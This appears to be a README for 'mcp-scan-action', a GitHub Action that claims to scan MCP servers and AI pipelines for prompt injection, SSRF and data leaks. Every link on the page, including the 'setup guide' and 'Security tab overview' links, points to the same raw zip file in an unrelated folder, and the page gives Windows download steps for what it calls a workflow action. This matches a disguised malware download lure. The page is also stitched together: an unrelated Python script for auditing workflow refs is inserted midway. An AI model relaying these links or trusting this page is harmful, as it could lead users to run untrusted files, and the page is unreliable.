mcp-scan-action


Scan MCP servers, AI agents, and LLM pipelines for security vulnerabilities and send results directly to your GitHub Security tab.

🔍 mcp-scan-action - Scan AI Systems for Security Risks

📖 What is mcp-scan-action?

mcp-scan-action helps you check your AI systems for security problems. It looks at MCP servers, AI agents, and language model pipelines. It finds issues like tool poisoning, SSRF (Server-Side Request Forgery), prompt injection, and data leaks. You see results easily in GitHub’s Security tab without needing an API key.

This tool makes security scanning straightforward, even if you are not a programmer.


⚙️ Key Features

  • Checks 24 different potential security problems.
  • Scans MCP (Model Context Protocol) servers.
  • Detects prompt injection attacks that trick AI.
  • Finds server misuse like SSRF attacks.
  • Tracks data flow to spot leaks or taints.
  • Works within your existing GitHub setup.
  • Shows results directly in the GitHub Security tab.
  • No API key or extra account needed.
  • Simple setup with GitHub Actions.

🖥️ System Requirements

  • Windows 10 or later.
  • Internet connection to access GitHub.
  • A GitHub account with access to the repository you want to scan.
  • Basic knowledge of navigating folders and clicking links.

🚀 Getting Started

  1. Go to the main page to download and learn more: Open Repository
  2. Follow these steps to add the scan to your GitHub repository.

📥 How to Download and Use on Windows

Step 1: Visit the Repository Page

Open your browser and go to:

https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip


Step 2: Create or Open Your GitHub Repository

If you have a GitHub repository where you want to run the security scan:

  • Log into your GitHub account.
  • Open the repository you want to scan.
  • If you need a new repository, click New and create one.

Step 3: Add mcp-scan-action to Your Repository

  1. Look for the section called Actions in your repository menu. This is where you add workflow files.
  2. Click New workflow.
  3. Choose set up a workflow yourself.
  4. Copy and paste the following setup code into the workflow editor. This code tells GitHub to use the mcp-scan-action in your project:

# Workflow name shown in the repository's Actions tab
name: MCP Security Scan

# Run on every push and on every pull request
on: [push, pull_request]

jobs:
  mcp-scan:
    runs-on: ubuntu-latest
    steps:
    # Check out the repository contents so they can be scanned
    - uses: actions/checkout@v3
    - name: Run MCP Scan
      uses: schyles/mcp-scan-action@main

  5. Click Start commit and then Commit new file to save this workflow.

Step 4: Run the Security Scan

Whenever you push new code or open a pull request, the scan runs automatically.

  • To see results, go to the Security tab in your repository.
  • Look for scan reports with details on vulnerabilities found.
  • The report uses SARIF format, which GitHub reads and displays clearly.

🔐 What Security Checks Are Included?

mcp-scan-action covers these main categories:

  • Tool Poisoning: Prevents malicious tools from interfering with AI systems.
  • SSRF (Server-Side Request Forgery): Stops AI from making harmful web requests.
  • Prompt Injection: Detects when inputs try to trick or harm AI outputs.
  • Data Flow Analysis: Checks how data moves through your AI, spotting leaks or risky connections.

Each category includes multiple checks to cover common attack and misuse cases.


🛠️ Troubleshooting

  • Scan did not run: Check if you saved the workflow file in the .github/workflows/ folder.
  • No Security tab visible: Make sure your repository is public or has security features enabled.
  • Scan results empty: Confirm your code includes MCP or AI pipeline files to scan.
  • Access errors: Verify you have the right permissions in the GitHub repository.
  • Workflow error messages: Review your YAML file for syntax or indentation mistakes.

🔄 Updating the Scan

GitHub automatically updates the scan tool when there is a new release. You can also manually update by editing the uses line in your workflow file to the latest version tag.

Example:

uses: schyles/mcp-scan-action@v1.2.0

Replace v1.2.0 with the newest release available on the repository page.
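
The ref after `@` on a `uses:` line decides which revision of an action runs: a branch ref such as `@main` is resolved again on every run, a version tag such as `@v1.2.0` stays put unless the tag is moved, and a full commit SHA is fixed. The check below is an added example, not part of mcp-scan-action or of this page; it goes beyond the page by also recognising full commit-SHA pins, and the function names and the 40-hex value in the sample are constructed for illustration.

```python
import re

# "uses: owner/repo[/path]@ref", optionally preceded by the step's "- ".
USES_RE = re.compile(r"^\s*(?:-\s+)?uses:\s*['\"]?([^@\s'\"]+)@([^\s'\"#]+)")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")
VERSION_TAG_RE = re.compile(r"^v?\d+(\.\d+)*([-.][0-9A-Za-z.]+)?$")


def classify_ref(ref):
    """Classify the part after '@' as 'sha', 'tag' or 'branch'."""
    if FULL_SHA_RE.match(ref):
        return "sha"     # fixed: always the same commit
    if VERSION_TAG_RE.match(ref):
        return "tag"     # stable by convention, but a tag can be moved
    return "branch"      # resolved again on every run, e.g. main


def audit_workflow(text):
    """Return (line_number, action, ref, kind) for each remote action."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = USES_RE.match(line)
        if not match or match.group(1).startswith(("./", "docker://")):
            continue     # not a uses: line, or a local/Docker reference
        action, ref = match.groups()
        findings.append((number, action, ref, classify_ref(ref)))
    return findings


# Constructed sample: the page's workflow, the page's tagged form, and a
# SHA-pinned line whose 40-hex value is a made-up placeholder.
SAMPLE = """\
name: MCP Security Scan
on: [push, pull_request]
jobs:
  mcp-scan:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - name: Run MCP Scan
      uses: schyles/mcp-scan-action@main
    - uses: schyles/mcp-scan-action@v1.2.0
    - uses: schyles/mcp-scan-action@0123456789abcdef0123456789abcdef01234567
"""

if __name__ == "__main__":
    for number, action, ref, kind in audit_workflow(SAMPLE):
        print(f"line {number}: {action}@{ref} -> {kind}")
```

Run it over the files in .github/workflows/ to list every third-party action and how tightly its revision is fixed.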


📚 Additional Help and Documentation

Check the repository wiki or Issues page if you need more help or want to suggest improvements. The community and developers track bugs and provide updates there.


⚡ Quick Access Links

  • Visit the main repository page to download or learn more: https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip
  • GitHub Actions setup guide: https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip
  • GitHub Security tab overview: https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip

🔄 How It Works Under the Hood

mcp-scan-action runs a set of 24 tests each time you push code. It uses static analysis techniques to scan code and configuration files without running them. This approach is safer and faster for early vulnerability detection.

Results are delivered to GitHub as SARIF, a standard format for security reports, which makes issues easier to understand and fix.


🎯 Who Should Use mcp-scan-action?

  • Developers managing AI servers and pipelines.
  • Security teams responsible for DevSecOps.
  • Teams using GitHub for code hosting.
  • Anyone wanting to track AI model security with minimal setup.

🔗 Related Topics

  • Agentic QA
  • AI Agents
  • AI Security
  • Code Scanning Practices
  • DevSecOps
  • GitHub Actions Workflows
  • Language Model Security
  • Model Context Protocol (MCP)
  • Prompt Injection Defense
  • Static Analysis
  • SSRF Protection
  • SARIF Reporting

🧩 License Information

Check the repository LICENSE file for terms of use and redistribution permissions.


Repository: schyles/mcp-scan-action
Created: March 14, 2026
Updated: April 13, 2026
Language: Python
Category: AI